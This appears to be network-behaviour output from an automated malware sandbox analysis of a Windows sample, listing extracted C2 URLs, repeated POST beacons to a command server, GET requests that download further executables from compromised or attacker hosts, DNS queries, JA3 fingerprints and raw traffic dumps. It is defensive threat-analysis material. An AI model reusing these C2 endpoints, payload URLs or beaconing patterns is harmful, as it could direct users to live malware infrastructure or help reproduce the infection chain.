Source: C:\Windows\explorer.exe	Network Connect: 104.196.109.209 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 189.195.132.134 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://trad-einmyus.com/index.php
Source: Malware configuration extractor	URLs: http://tradein-myus.com/index.php
Source: Malware configuration extractor	URLs: http://trade-inmyus.com/index.php
Source: Malware configuration extractor	URLs: http://cajgtus.com/test1/get.php

Downloads executable code via HTTP

Source: global traffic

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: THEZONEBG THEZONEBG
Source: Joe Sandbox View	ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
Source: Joe Sandbox View	ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /klok.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.safeautomationbd.com
Source: global traffic	HTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
Source: global traffic	HTTP traffic detected: GET /get/Dztc3/3edag44.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.adttemp.com.br
Source: global traffic	HTTP traffic detected: GET /attachments/1234297369122832404/1240152736272744458/Ogsxr.exe?ex=664585bd&is=6644343d&hm=ab86f976d0139ed85f7d9db2329fe1dca0c9135ad507ed65702b0c38a838bc63& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uueesayjrfreir.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iwsxcppjhqhjgrrq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://thkyawmtyirckg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://thkyawmtyirckg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: trad-einmyus.comData Raw: 12 87 8a 98 1c f5 d5 c3 be 38 0d 35 0d cd 91 88 35 12 dd 31 d8 30 68 9f c8 ec aa 82 88 a0 9b 84 1a b6 54 a2 18 18 ce e2 9e d2 f3 d8 d9 95 15 05 6b 98 69 fc e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9f 66 5d 02 c8 a1 c1 64 1f 94 9a 32 4a 99 09 23 c7 06 7d 46 57 78 a6 b2 bf 5e d0 c1 96 c3 19 7f 01 38 09 bc 49 61 f3 7d 28 46 7b c4 0c f2 84 19 a3 1c 50 00 66 b0 b5 25 2c 21 e2 71 f7 8d 32 1d d7 ea 75 8b 53 5a 31 d4 11 e7 58 99 ac 82 b7 d8 1d 87 2c 80 13 7d 16 50 1a 90 50 8f cb 2d e4 e5 15 e8 80 11 05 69 91 f3 f5 8f e8 09 44 e2 82 b4 d0 b1 1b 49 ca 9b c4 b2 3a 55 3c 47 4d 90 84 4e 6b 29 a9 ed c3 4c e6 55 78 34 80 62 2a c6 cf 51 b8 5e a9 52 ea a2 13 70 8d 6c f1 96 8a 36 bc fc 6f 0a d9 56 6a cc fd fa d9 52 f8 ed 47 3e b9 1a 89 9e 55 68 d8 b2 4d bd 46 b0 46 41 31 Data Ascii: 85510hTki\Fu$f]d2J#}FWx^8Ia}(F{Pf%,!q2uSZ1X,}PP-iDI:U<GMNk)LUx4b*Q^Rpl6oVjRG>UhMFFA1
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rioevlgrijblpvj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tipxeencccax.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uqmdmpeitsjpr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://exglegmgsoinxfa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://foqijkgaubdv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://woopcmiqbunxss.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ygfxxlyxtugpt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mjfdxwjlegvlo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iomelhkuumg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://psvrsaaxqdgtape.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ihtjdfldhcmdsyu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ltqpgqldqfpdbn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://guuoxthmrquxeg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vjnupjdvrapfef.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pdwlmngyryf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bpekfuqcomkt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oagagegmxjf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uixyrqbtokxe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wxiiulglaeast.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tgavifdbsqysl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rjuutmrbshngx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lvmnvbwulwkgv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bsmclpnjtgf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nbhwmwqlrnqx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tghxfbpwpyne.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tosbfmevenvb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uijilgjtmap.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://smqxfaescqr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rgwmudjewscyl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lwpyeiimsmb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: GET /wek.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.92.253.69
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yulmcjqodavf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: GET /feswad.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.154.13.143
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uvaxpgauwksv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xsufixnxoxd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: GET /lend/jfesawdr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.233.132.167
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pilatjvtgqwtdre.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: trad-einmyus.com

Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.69
Source: unknown	TCP traffic detected without corresponding DNS query: 185.154.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 185.154.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 185.154.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 185.154.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.167
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.167
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.167
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.167
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 9_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

9_2_0040CF10

Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /klok.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.safeautomationbd.com
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /get/Dztc3/3edag44.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.adttemp.com.br
Source: global traffic	HTTP traffic detected: GET /attachments/1234297369122832404/1240152736272744458/Ogsxr.exe?ex=664585bd&is=6644343d&hm=ab86f976d0139ed85f7d9db2329fe1dca0c9135ad507ed65702b0c38a838bc63& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
Source: global traffic	HTTP traffic detected: GET /test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic	HTTP traffic detected: GET /wek.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.92.253.69
Source: global traffic	HTTP traffic detected: GET /feswad.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.154.13.143
Source: global traffic	HTTP traffic detected: GET /lend/jfesawdr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.233.132.167

Source: 33A3.exe, 00000010.00000003.2558089861.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 33A3.exe, 00000010.00000003.2558921582.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: 33A3.exe, 00000010.00000003.2559114058.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: trad-einmyus.com
Source: global traffic	DNS traffic detected: DNS query: sdfjhuz.com
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: api.2ip.ua
Source: global traffic	DNS traffic detected: DNS query: 157.123.68.40.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: www.safeautomationbd.com
Source: global traffic	DNS traffic detected: DNS query: cajgtus.com
Source: global traffic	DNS traffic detected: DNS query: nessotechbd.com
Source: global traffic	DNS traffic detected: DNS query: transfer.adttemp.com.br
Source: global traffic	DNS traffic detected: DNS query: cdn.discordapp.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 24 May 2024 15:38:48 GMTalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 24 May 2024 15:38:58 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://nessotechbd.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingX-Endurance-Cache-Level: 2Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 24 May 2024 15:39:28 GMTServer: Transfer.sh HTTP Server 1.0Content-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffX-Made-With: <3 by DutchCodersX-Served-By: Proudly served by DutchCodersContent-Length: 15Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 24 May 2024 15:39:36 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=pGm99wmCAuWP2Xlm2F3H6Nj9DPbdQ46hGe7nOuAhATk-1716565176-1.0.1.1-DlNAaO6bu8OAFP_xmvFB7grrrpanrPetiZUyTUkHFvojunqzTItQfwj9eB8esQ.4wpT2mFviM6LezISvdQjt_g; path=/; expires=Fri, 24-May-24 16:09:36 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5L0uV8QrmrBrxrdD4Opq5u%2BY0334aVpWrGqharJomzjGUMN7vtPMkndODipg%2FCuHLhz3pzPpXHUt%2Bm1wBd9id0W0TBzyGqBU16NzoCa0XyEQYaNQt26d5BZrQmzzDGCJZnJ5fQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=WUxgC_R7cGcnsTb65gzUOT34Uc2FnsTMpXY2h4cy8K8-1716565176237-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 888e611f5941420b-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 38 0d 0a 04 00 00 00 79 fa f7 1c 0d 0a 30 0d 0a 0d 0a Data Ascii: 8y0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73\|"s2h3T'cSc"8iz`;?Dt0
